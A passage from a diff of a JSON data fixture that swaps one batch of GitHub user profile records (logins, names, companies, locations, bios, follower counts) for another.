CLOWarden, GitVote and Landscape2 for the @cncf ☁️", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1864, + "pk": 7162, "fields": { - "nest_created_at": "2024-09-12T00:28:57.758Z", - "nest_updated_at": "2024-09-12T00:28:57.758Z", - "name": "", - "login": "RomRom1", + "nest_created_at": "2024-09-22T08:42:03.402Z", + "nest_updated_at": "2024-09-22T19:26:46.300Z", + "name": "Eline Henriksen", + "login": "eliihen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28763142?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5845924?v=4", + "company": "@TelenorNorway", + "location": "Norway", "collaborators_count": 0, - "following_count": 8, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-05-17T17:43:33Z", - "updated_at": "2024-09-10T08:49:17Z", - "node_id": "MDQ6VXNlcjI4NzYzMTQy", - "bio": "My projects are on gitlab, sorry", + "following_count": 58, + "followers_count": 48, + "public_gists_count": 10, + "public_repositories_count": 84, + "created_at": "2013-11-03T21:18:55Z", + "updated_at": "2024-09-09T09:27:26Z", + "node_id": "MDQ6VXNlcjU4NDU5MjQ=", + "bio": "Web developer and Linuxphile", "is_hireable": false, - "twitter_username": "" + "twitter_username": "eliihen" } }, { "model": "github.user", - "pk": 1865, + "pk": 7163, "fields": { - "nest_created_at": "2024-09-12T00:28:59.769Z", - "nest_updated_at": "2024-09-12T00:28:59.769Z", - "name": "", - "login": "simondivi", + "nest_created_at": "2024-09-22T08:42:03.751Z", + "nest_updated_at": "2024-09-22T19:26:46.620Z", + "name": "Felix Belz", + "login": "fbelz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65011929?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/102956833?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-05-08T08:10:53Z", - "updated_at": "2024-04-09T12:13:06Z", - "node_id": "MDQ6VXNlcjY1MDExOTI5", + "public_repositories_count": 1, + "created_at": "2022-04-04T09:30:41Z", + "updated_at": "2022-12-09T07:50:29Z", + "node_id": "U_kgDOBiL_IQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406878,24 +665002,49 @@ }, { "model": "github.user", - "pk": 1866, + "pk": 7164, "fields": { - "nest_created_at": "2024-09-12T00:29:01.832Z", - "nest_updated_at": "2024-09-12T00:29:01.832Z", - "name": "", - "login": "sant0sh", + "nest_created_at": "2024-09-22T08:42:04.093Z", + "nest_updated_at": "2024-09-22T19:26:46.937Z", + "name": "Heiko Kiesel", + "login": "Zero3141", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33697194?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/45092958?v=4", + "company": "TU Darmstadt", + "location": "Germany", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-11-16T08:50:48Z", + "updated_at": "2024-09-22T14:46:22Z", + "node_id": "MDQ6VXNlcjQ1MDkyOTU4", + "bio": "", + "is_hireable": false, + "twitter_username": "Zeroo3141" + } +}, +{ + "model": "github.user", + "pk": 7165, + "fields": { + "nest_created_at": "2024-09-22T08:42:04.415Z", + "nest_updated_at": "2024-09-22T19:26:47.282Z", + "name": "Jasper", + "login": "JBO0560", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38783625?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-11-15T16:50:49Z", - "updated_at": "2024-07-22T13:59:34Z", - "node_id": "MDQ6VXNlcjMzNjk3MTk0", + "public_repositories_count": 0, + "created_at": "2018-04-27T10:08:35Z", + "updated_at": "2024-05-27T13:33:54Z", + "node_id": "MDQ6VXNlcjM4NzgzNjI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406903,49 +665052,49 @@ }, { "model": "github.user", - "pk": 1867, + "pk": 7166, "fields": { - "nest_created_at": "2024-09-12T00:29:04.030Z", - "nest_updated_at": "2024-09-12T00:29:04.030Z", - "name": "Marc Schöchlin", - "login": "scoopex", - "email": "ms-github@256bit.org", - "avatar_url": "https://avatars.githubusercontent.com/u/288876?v=4", - "company": "Open Source Business Alliance – Bundesverband für digitale Souveränität e.V.", - "location": "Stuttgart", + "nest_created_at": "2024-09-22T08:42:04.732Z", + "nest_updated_at": "2024-09-22T19:26:47.596Z", + "name": "SWFox", + "login": "sw-fox", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56607198?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 52, - "followers_count": 68, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 39, - "created_at": "2010-05-27T17:08:45Z", - "updated_at": "2024-09-01T15:14:45Z", - "node_id": "MDQ6VXNlcjI4ODg3Ng==", - "bio": "Site Reliability Engineering/scs.community, Observability, Software Architecture, OpenSource, Linux, Python, Golang, Kubernetes, amused by the cloud naive", + "public_repositories_count": 11, + "created_at": "2019-10-15T18:53:17Z", + "updated_at": "2024-08-24T16:55:41Z", + "node_id": "MDQ6VXNlcjU2NjA3MTk4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1868, + "pk": 7167, "fields": { - "nest_created_at": "2024-09-12T00:29:07.773Z", - "nest_updated_at": "2024-09-12T00:33:13.113Z", + "nest_created_at": "2024-09-22T08:42:05.047Z", + "nest_updated_at": "2024-09-22T19:26:47.915Z", "name": "", - "login": "andrewm-aero", + "login": "johannawalker", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33724014?v=4", - "company": "The Aerospace Corporation", + "avatar_url": "https://avatars.githubusercontent.com/u/77020683?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2017-11-16T13:52:14Z", - "updated_at": "2023-05-23T20:20:24Z", - "node_id": "MDQ6VXNlcjMzNzI0MDE0", + "public_repositories_count": 0, + "created_at": "2021-01-05T18:22:17Z", + "updated_at": "2022-04-12T09:17:58Z", + "node_id": "MDQ6VXNlcjc3MDIwNjgz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406953,99 +665102,99 @@ }, { "model": "github.user", - "pk": 1869, + "pk": 7168, "fields": { - "nest_created_at": "2024-09-12T00:29:10.618Z", - "nest_updated_at": "2024-09-12T00:29:10.618Z", - "name": "GUNFLUENZA", - "login": "gun082544", + "nest_created_at": "2024-09-22T08:42:05.373Z", + "nest_updated_at": "2024-09-22T19:26:48.242Z", + "name": "Lukas Stanek", + "login": "lukasstanek", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/56395331?v=4", - "company": "IBM Digital Talent for Business", - "location": "Bangkok,Thailand", + "avatar_url": "https://avatars.githubusercontent.com/u/24509523?v=4", + "company": "", + "location": "Vienna", "collaborators_count": 0, - "following_count": 45, - "followers_count": 25, + "following_count": 6, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2019-10-10T12:04:20Z", - "updated_at": "2024-05-21T09:38:37Z", - "node_id": "MDQ6VXNlcjU2Mzk1MzMx", - "bio": "", + "public_repositories_count": 12, + "created_at": "2016-12-11T16:55:07Z", + "updated_at": "2024-08-28T13:05:00Z", + "node_id": "MDQ6VXNlcjI0NTA5NTIz", + "bio": "Software engineer,\r\nelectronics / iot hobbyist,\r\nautonomous vehicle fanboy", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1870, + "pk": 7169, "fields": { - "nest_created_at": "2024-09-12T00:29:11.848Z", - "nest_updated_at": "2024-09-12T00:29:11.848Z", - "name": "", - "login": "1187849698", + "nest_created_at": "2024-09-22T08:42:06.320Z", + "nest_updated_at": "2024-09-22T19:26:49.206Z", + "name": "Aleksandr Ovsiannikov", + "login": "1ovsss", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122343225?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/118110615?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-10T06:33:08Z", - "updated_at": "2023-01-10T06:33:08Z", - "node_id": "U_kgDOB0rPOQ", - "bio": "", + "public_repositories_count": 7, + "created_at": "2022-11-13T12:09:16Z", + "updated_at": "2024-08-06T15:52:01Z", + "node_id": "U_kgDOBwo5lw", + "bio": "DevOps Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1871, + "pk": 7170, "fields": { - "nest_created_at": "2024-09-12T00:29:13.113Z", - "nest_updated_at": "2024-09-12T00:29:13.113Z", - "name": "", - "login": "danburke-fidlar", + "nest_created_at": "2024-09-22T08:42:11.305Z", + "nest_updated_at": "2024-09-22T19:26:54.222Z", + "name": "Scala Steward", + "login": "scala-steward", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43554048?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43047562?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 149, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-09-24T20:22:49Z", - "updated_at": "2024-07-08T16:15:03Z", - "node_id": "MDQ6VXNlcjQzNTU0MDQ4", - "bio": "", + "public_repositories_count": 2337, + "created_at": "2018-09-06T19:35:35Z", + "updated_at": "2024-01-12T09:36:27Z", + "node_id": "MDQ6VXNlcjQzMDQ3NTYy", + "bio": "I'm a bot trying to keep your Scala projects up-to-date.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1872, + "pk": 7171, "fields": { - "nest_created_at": "2024-09-12T00:29:14.300Z", - "nest_updated_at": "2024-09-12T00:29:14.300Z", - "name": "Dagang Wei", - "login": "functicons", + "nest_created_at": "2024-09-22T08:42:11.950Z", + "nest_updated_at": "2024-09-22T19:42:03.607Z", + "name": "", + "login": "sullis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38472985?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30938?v=4", "company": "", - "location": "California", + "location": "Portland, Oregon, USA", "collaborators_count": 0, - "following_count": 33, - "followers_count": 24, - "public_gists_count": 6, - "public_repositories_count": 107, - "created_at": "2018-04-17T17:44:16Z", - "updated_at": "2024-08-10T11:41:14Z", - "node_id": "MDQ6VXNlcjM4NDcyOTg1", + "following_count": 228, + "followers_count": 105, + "public_gists_count": 0, + "public_repositories_count": 1181, + "created_at": "2008-10-25T02:11:11Z", + "updated_at": "2024-09-13T11:28:41Z", + "node_id": "MDQ6VXNlcjMwOTM4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407053,99 +665202,99 @@ }, { "model": "github.user", - "pk": 1873, + "pk": 7172, "fields": { - "nest_created_at": "2024-09-12T00:29:16.002Z", - "nest_updated_at": "2024-09-12T00:34:42.889Z", - "name": "Peter Zmilczak", - "login": "marwin1991", - "email": "peter.zmilczak@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/25181517?v=4", - "company": "SoftNet LTD, CodeCool LTD", - "location": "Cracow", + "nest_created_at": "2024-09-22T08:42:12.592Z", + "nest_updated_at": "2024-09-22T19:26:55.475Z", + "name": "Martin Riedel", + "login": "mrtnrdl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1167062?v=4", + "company": "codecentric AG", + "location": "Germany", "collaborators_count": 0, - "following_count": 67, - "followers_count": 93, - "public_gists_count": 3, - "public_repositories_count": 109, - "created_at": "2017-01-17T17:35:56Z", - "updated_at": "2024-08-23T11:42:40Z", - "node_id": "MDQ6VXNlcjI1MTgxNTE3", - "bio": "Software Engineer Java/Spring/Android - \r\nDevOps Approach Lover - \r\nStock Market Enthusiast\r\n", - "is_hireable": true, + "following_count": 137, + "followers_count": 31, + "public_gists_count": 8, + "public_repositories_count": 94, + "created_at": "2011-11-02T10:42:41Z", + "updated_at": "2024-09-20T07:16:14Z", + "node_id": "MDQ6VXNlcjExNjcwNjI=", + "bio": "build & break things.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1874, + "pk": 7173, "fields": { - "nest_created_at": "2024-09-12T00:29:17.232Z", - "nest_updated_at": "2024-09-12T00:29:17.232Z", - "name": "", - "login": "parimala-kathir", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72544136?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:42:12.916Z", + "nest_updated_at": "2024-09-22T19:26:55.790Z", + "name": "Jason Pickens", + "login": "steinybot", + "email": "jasonpickensnz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4659562?v=4", + "company": "@BotTech", + "location": "Auckland - New Zealand", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-10-08T07:17:30Z", - "updated_at": "2023-09-12T12:20:40Z", - "node_id": "MDQ6VXNlcjcyNTQ0MTM2", - "bio": "", - "is_hireable": false, + "following_count": 19, + "followers_count": 21, + "public_gists_count": 44, + "public_repositories_count": 115, + "created_at": "2013-06-10T09:10:44Z", + "updated_at": "2024-09-10T09:36:26Z", + "node_id": "MDQ6VXNlcjQ2NTk1NjI=", + "bio": "Passionate about Scala and Reactive Systems.\r\n\r\nFormer Lightbender.\r\n\r\nSee @BotTech for my projects.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1875, + "pk": 7174, "fields": { - "nest_created_at": "2024-09-12T00:29:18.449Z", - "nest_updated_at": "2024-09-12T01:31:27.034Z", - "name": "Dr UV Wildner", - "login": "uvwildos", + "nest_created_at": "2024-09-22T08:42:13.229Z", + "nest_updated_at": "2024-09-22T19:28:26.329Z", + "name": "Kevin Tham", + "login": "ktham", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122446445?v=4", - "company": "OS@German Telekom", - "location": "Berlin", + "avatar_url": "https://avatars.githubusercontent.com/u/882701?v=4", + "company": "Iterable, Inc.", + "location": "Los Angeles, CA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-11T10:47:54Z", - "updated_at": "2023-11-20T15:43:41Z", - "node_id": "U_kgDOB0xibQ", - "bio": "problem solving", + "following_count": 35, + "followers_count": 23, + "public_gists_count": 9, + "public_repositories_count": 41, + "created_at": "2011-06-28T23:34:47Z", + "updated_at": "2024-07-30T17:37:47Z", + "node_id": "MDQ6VXNlcjg4MjcwMQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1876, + "pk": 7175, "fields": { - "nest_created_at": "2024-09-12T00:29:19.727Z", - "nest_updated_at": "2024-09-12T00:29:49.326Z", - "name": "", - "login": "jiri-bocan", + "nest_created_at": "2024-09-22T08:42:13.570Z", + "nest_updated_at": "2024-09-22T19:26:56.431Z", + "name": "Arjen Wisse", + "login": "arjenw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/97094652?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1300534?v=4", + "company": "Mendix", + "location": "Amersfoort", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-01-04T10:13:30Z", - "updated_at": "2024-08-28T10:47:49Z", - "node_id": "U_kgDOBcmL_A", + "public_repositories_count": 17, + "created_at": "2012-01-03T08:23:50Z", + "updated_at": "2024-08-12T08:46:54Z", + "node_id": "MDQ6VXNlcjEzMDA1MzQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407153,49 +665302,49 @@ }, { "model": "github.user", - "pk": 1877, + "pk": 7176, "fields": { - "nest_created_at": "2024-09-12T00:29:21.352Z", - "nest_updated_at": "2024-09-12T00:29:21.352Z", - "name": "", - "login": "mjrother", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1778861?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:42:13.892Z", + "nest_updated_at": "2024-09-22T19:26:56.747Z", + "name": "Dmitry Sabanin", + "login": "dsabanin", + "email": "sdmitry@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8316?v=4", + "company": "@trueml", + "location": "Downingtown, PA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2012-05-25T17:53:31Z", - "updated_at": "2023-01-18T20:23:04Z", - "node_id": "MDQ6VXNlcjE3Nzg4NjE=", - "bio": "", + "following_count": 53, + "followers_count": 50, + "public_gists_count": 21, + "public_repositories_count": 128, + "created_at": "2008-04-24T00:34:10Z", + "updated_at": "2024-09-11T18:19:26Z", + "node_id": "MDQ6VXNlcjgzMTY=", + "bio": "Engineering Lead and Staff Engineer at TrueAccord. I create and solve problems with Scala, Swift, TypeScript, React, Ruby, Clj, Spark, Kubernetes, and much more", "is_hireable": false, - "twitter_username": "" + "twitter_username": "DmitrySabanin" } }, { "model": "github.user", - "pk": 1878, + "pk": 7177, "fields": { - "nest_created_at": "2024-09-12T00:29:22.568Z", - "nest_updated_at": "2024-09-12T00:29:22.568Z", - "name": "", - "login": "rk7373", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92785266?v=4", + "nest_created_at": "2024-09-22T08:42:14.214Z", + "nest_updated_at": "2024-09-22T19:26:57.067Z", + "name": "Espen Wiborg", + "login": "espenhw", + "email": "espenhw@grumblemurf.org", + "avatar_url": "https://avatars.githubusercontent.com/u/53942?v=4", "company": "", - "location": "", + "location": "Oslo/Norway", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 17, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-10-19T08:51:54Z", - "updated_at": "2022-11-21T12:22:22Z", - "node_id": "U_kgDOBYfKcg", + "public_repositories_count": 35, + "created_at": "2009-02-12T14:57:57Z", + "updated_at": "2024-08-15T11:25:08Z", + "node_id": "MDQ6VXNlcjUzOTQy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407203,74 +665352,74 @@ }, { "model": "github.user", - "pk": 1879, + "pk": 7178, "fields": { - "nest_created_at": "2024-09-12T00:29:24.148Z", - "nest_updated_at": "2024-09-12T00:29:24.148Z", - "name": "Przemyslaw Kalucki", - "login": "PAKalucki", - "email": "pakalucki@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/11369174?v=4", + "nest_created_at": "2024-09-22T08:42:14.524Z", + "nest_updated_at": "2024-09-22T19:26:57.383Z", + "name": "Hosam Aly", + "login": "hosamaly", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/330633?v=4", "company": "", - "location": "Poland", + "location": "Luton, England, United Kingdom", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 26, - "created_at": "2015-03-07T21:48:20Z", - "updated_at": "2024-08-27T13:25:46Z", - "node_id": "MDQ6VXNlcjExMzY5MTc0", - "bio": "", - "is_hireable": false, + "following_count": 1, + "followers_count": 41, + "public_gists_count": 3, + "public_repositories_count": 62, + "created_at": "2010-07-13T10:16:41Z", + "updated_at": "2024-05-31T22:51:22Z", + "node_id": "MDQ6VXNlcjMzMDYzMw==", + "bio": "A polyglot software engineer with 15+ years of experience who cares about quality, performance, and process improvement. Top 1% on StackOverflow.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1880, + "pk": 7179, "fields": { - "nest_created_at": "2024-09-12T00:29:25.764Z", - "nest_updated_at": "2024-09-12T00:29:25.764Z", - "name": "", - "login": "robocrock", + "nest_created_at": "2024-09-22T08:42:14.837Z", + "nest_updated_at": "2024-09-22T19:26:57.698Z", + "name": "Nikhil", + "login": "nikhilpatil", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/123635696?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1115876?v=4", + "company": "@lavego.de", + "location": "Munich, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-26T11:05:03Z", - "updated_at": "2023-01-26T11:05:03Z", - "node_id": "U_kgDOB16H8A", - "bio": "", - "is_hireable": false, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 4, + "public_repositories_count": 15, + "created_at": "2011-10-10T09:23:27Z", + "updated_at": "2024-08-01T19:06:02Z", + "node_id": "MDQ6VXNlcjExMTU4NzY=", + "bio": "Software Developer @Lavego, Munich", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1881, + "pk": 7180, "fields": { - "nest_created_at": "2024-09-12T00:29:27.755Z", - "nest_updated_at": "2024-09-12T00:29:27.755Z", - "name": "", - "login": "simon-n", + "nest_created_at": "2024-09-22T08:42:15.178Z", + "nest_updated_at": "2024-09-22T19:26:58.026Z", + "name": "Stefano S.", + "login": "gokyo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1196379?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6510179?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 238, + "followers_count": 33, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2011-11-15T11:34:20Z", - "updated_at": "2024-05-21T07:14:22Z", - "node_id": "MDQ6VXNlcjExOTYzNzk=", + "public_repositories_count": 83, + "created_at": "2014-01-27T01:12:09Z", + "updated_at": "2024-08-28T20:46:37Z", + "node_id": "MDQ6VXNlcjY1MTAxNzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407278,24 +665427,24 @@ }, { "model": "github.user", - "pk": 1882, + "pk": 7181, "fields": { - "nest_created_at": "2024-09-12T00:29:28.980Z", - "nest_updated_at": "2024-09-12T00:29:28.980Z", - "name": "Shawn Crain", - "login": "scrain", + "nest_created_at": "2024-09-22T08:42:15.493Z", + "nest_updated_at": "2024-09-22T19:26:58.338Z", + "name": "Wenxiao He", + "login": "wenxiaohe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/883050?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/17000386?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 2, - "public_gists_count": 9, - "public_repositories_count": 51, - "created_at": "2011-06-29T03:40:25Z", - "updated_at": "2024-06-17T22:10:07Z", - "node_id": "MDQ6VXNlcjg4MzA1MA==", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-02-01T07:07:25Z", + "updated_at": "2022-12-02T18:12:51Z", + "node_id": "MDQ6VXNlcjE3MDAwMzg2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407303,49 +665452,49 @@ }, { "model": "github.user", - "pk": 1883, + "pk": 7182, "fields": { - "nest_created_at": "2024-09-12T00:29:30.170Z", - "nest_updated_at": "2024-09-12T00:35:09.565Z", - "name": "Nils Christian Ehmke", - "login": "nils-christian", + "nest_created_at": "2024-09-22T08:42:20.998Z", + "nest_updated_at": "2024-09-22T19:27:57.396Z", + "name": "Wei Ma", + "login": "wmaintw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30949845?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1617435?v=4", "company": "", - "location": "Kiel", + "location": "Chengdu", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 6, - "public_repositories_count": 32, - "created_at": "2017-08-12T08:23:14Z", - "updated_at": "2024-09-04T06:09:53Z", - "node_id": "MDQ6VXNlcjMwOTQ5ODQ1", - "bio": "Software Architect by Destiny", + "following_count": 3, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2012-04-06T02:40:34Z", + "updated_at": "2023-12-27T01:49:10Z", + "node_id": "MDQ6VXNlcjE2MTc0MzU=", + "bio": "", "is_hireable": false, - "twitter_username": "NilsEhmke" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1884, + "pk": 7183, "fields": { - "nest_created_at": "2024-09-12T00:29:34.222Z", - "nest_updated_at": "2024-09-12T00:29:34.222Z", - "name": "", - "login": "13daniel", + "nest_created_at": "2024-09-22T08:42:21.955Z", + "nest_updated_at": "2024-09-22T19:27:04.650Z", + "name": "Bernard D'Havé", + "login": "bdhave", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/102571214?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5267631?v=4", "company": "", - "location": "", + "location": "Feluy, Belgium", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-03-29T03:54:30Z", - "updated_at": "2024-05-07T10:29:53Z", - "node_id": "U_kgDOBh0czg", + "following_count": 25, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2013-08-20T06:58:42Z", + "updated_at": "2024-09-20T11:30:16Z", + "node_id": "MDQ6VXNlcjUyNjc2MzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407353,74 +665502,74 @@ }, { "model": "github.user", - "pk": 1885, + "pk": 7184, "fields": { - "nest_created_at": "2024-09-12T00:29:35.007Z", - "nest_updated_at": "2024-09-12T00:30:35.058Z", - "name": "Andrea Hade", - "login": "accade", + "nest_created_at": "2024-09-22T08:42:22.304Z", + "nest_updated_at": "2024-09-22T19:27:55.138Z", + "name": "Anthony Whitford", + "login": "awhitford", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63321686?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/123887?v=4", "company": "", - "location": "", + "location": "Los Angeles, CA", "collaborators_count": 0, - "following_count": 20, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-04-07T22:13:59Z", - "updated_at": "2024-08-09T09:18:23Z", - "node_id": "MDQ6VXNlcjYzMzIxNjg2", - "bio": "Less is more", - "is_hireable": false, + "following_count": 0, + "followers_count": 39, + "public_gists_count": 2, + "public_repositories_count": 37, + "created_at": "2009-09-06T18:23:39Z", + "updated_at": "2024-09-07T03:39:25Z", + "node_id": "MDQ6VXNlcjEyMzg4Nw==", + "bio": "Technology leader who still knows what it is like to be a developer.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1886, + "pk": 7185, "fields": { - "nest_created_at": "2024-09-12T00:29:36.253Z", - "nest_updated_at": "2024-09-12T00:29:36.253Z", - "name": "Timothy Pillow", - "login": "oregonpillow", + "nest_created_at": "2024-09-22T08:42:22.617Z", + "nest_updated_at": "2024-09-22T19:27:05.343Z", + "name": "Ray Sinnema", + "login": "RaySinnema", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53374403?v=4", - "company": "", - "location": "Zurich", + "avatar_url": "https://avatars.githubusercontent.com/u/3496035?v=4", + "company": "VelocityEHS", + "location": "Frederick, CO, USA", "collaborators_count": 0, - "following_count": 1, - "followers_count": 8, + "following_count": 3, + "followers_count": 17, "public_gists_count": 0, - "public_repositories_count": 59, - "created_at": "2019-07-27T14:34:55Z", - "updated_at": "2024-09-05T18:14:27Z", - "node_id": "MDQ6VXNlcjUzMzc0NDAz", - "bio": "email: vivid.gift2259 fastmail.com", + "public_repositories_count": 12, + "created_at": "2013-02-06T22:09:32Z", + "updated_at": "2024-09-21T02:53:11Z", + "node_id": "MDQ6VXNlcjM0OTYwMzU=", + "bio": "I try to be the best I can be in what I do. Mastery comes from deep insight developed by years of experience in trying out what works and what doesn't.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1887, + "pk": 7186, "fields": { - "nest_created_at": "2024-09-12T00:29:37.425Z", - "nest_updated_at": "2024-09-12T00:29:37.425Z", - "name": "", - "login": "mansing2", + "nest_created_at": "2024-09-22T08:42:22.938Z", + "nest_updated_at": "2024-09-22T19:27:05.657Z", + "name": "Stuart Taylor", + "login": "stuartraetaylor", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25703880?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/229520?v=4", "company": "", - "location": "", + "location": "United Kingdom", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 6, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 59, - "created_at": "2017-02-11T09:52:51Z", - "updated_at": "2024-05-30T04:34:50Z", - "node_id": "MDQ6VXNlcjI1NzAzODgw", + "public_repositories_count": 36, + "created_at": "2010-03-24T15:25:54Z", + "updated_at": "2024-08-05T14:56:36Z", + "node_id": "MDQ6VXNlcjIyOTUyMA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407428,24 +665577,24 @@ }, { "model": "github.user", - "pk": 1888, + "pk": 7187, "fields": { - "nest_created_at": "2024-09-12T00:29:38.670Z", - "nest_updated_at": "2024-09-12T00:29:38.670Z", - "name": "Lings-Sundar", - "login": "Lingom-R", + "nest_created_at": "2024-09-22T08:42:23.263Z", + "nest_updated_at": "2024-09-22T19:27:58.666Z", + "name": "", + "login": "bloihl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55315401?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8960977?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2019-09-14T10:15:50Z", - "updated_at": "2024-08-19T10:06:29Z", - "node_id": "MDQ6VXNlcjU1MzE1NDAx", + 